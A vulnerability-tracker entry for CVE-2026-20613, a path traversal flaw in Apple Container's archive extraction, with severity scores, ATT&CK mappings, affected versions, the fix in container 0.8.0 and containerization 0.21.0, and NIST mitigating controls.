Cyber Resilience

CVE-2026-20613

HighPublic PoC

Published: 23 January 2026

Published
23 January 2026
Modified
27 January 2026
KEV Added
Patch
CVSS Score v3.1 7.8 CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score 0.0001 1.9th percentile
Risk Priority 16 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2026-20613 is a high-severity Path Traversal (CWE-22) vulnerability in Apple Container. Its CVSS base score is 7.8 (High).

Operationally, exploitation aligns with the MITRE ATT&CK technique Registry Run Keys / Startup Folder (T1547.001); ranked at the 1.9th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.

The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).

Deeper analysis

CVE-2026-20613 is a path traversal vulnerability (CWE-22) in the ArchiveReader.extractContents() function, which is used by the cctl image load and container image load features. This function lacks pathname validation when extracting archive members, allowing a specially crafted archive to place files into arbitrary user-writable locations on the system via relative pathnames. The vulnerability affects the container and containerization components, with a CVSS v3.1 base score of 7.8 (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).

A local attacker can exploit this vulnerability by tricking a user into loading a maliciously constructed archive through cctl or container image load operations. No privileges are required, but user interaction is necessary, and the attack has low complexity. Successful exploitation enables the attacker to overwrite or create files in any user-writable directory, potentially leading to high impacts on confidentiality, integrity, and availability, such as disrupting system files or enabling further compromise.

The GitHub Security Advisory (GHSA-cq3j-qj2h-6rv3) confirms the issue and states it is addressed in container version 0.8.0 and containerization version 0.21.0, recommending users upgrade to these patched releases for mitigation.

EU & UK References

Vulnerability details

The ArchiveReader.extractContents() function used by cctl image load and container image load performs no pathname validation before extracting an archive member. This means that a carelessly or maliciously constructed archive can extract a file into any user-writable location on the…

more

system using relative pathnames. This issue is addressed in container 0.8.0 and containerization 0.21.0.

CWE(s)

Related Threats

MITRE ATT&CK Enterprise TechniquesAI

T1547.001 Registry Run Keys / Startup Folder Persistence
Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key.
T1554 Compromise Host Software Binary Persistence
Adversaries may modify host software binaries to establish persistent access to systems.
Why these techniques?

Path traversal enables arbitrary file write to user-writable locations, directly facilitating placement of autostart executables (T1547.001) or host binary compromise (T1554) for persistence/execution.

Confidence: MEDIUM · MITRE ATT&CK Enterprise v18.1

CVEs Like This One

CVE-2026-28827Same vendor: Apple
CVE-2026-20614Same vendor: Apple
CVE-2026-20660Same vendor: Apple
CVE-2026-20615Same vendor: Apple
CVE-2026-20688Same vendor: Apple
CVE-2022-50890Same vendor: Apple
CVE-2026-28855Same vendor: Apple
CVE-2026-28860Same vendor: Apple
CVE-2026-20677Same vendor: Apple
CVE-2025-24129Same vendor: Apple

Affected Assets

apple
container
≤ 0.8.0
apple
containerization
≤ 0.21.0

Mitigating Controls

Mitigating Controls (NIST 800-53 r5) AI

prevent

SI-10 directly mandates validation of pathnames in archive inputs before extraction, addressing the core lack of pathname validation in ArchiveReader.extractContents().

prevent

SI-2 ensures timely identification, reporting, and patching of the vulnerability, as fixed in container 0.8.0 and containerization 0.21.0.

prevent

AC-6 enforces least privilege to limit the scope of user-writable directories exploitable via path traversal during archive extraction.

References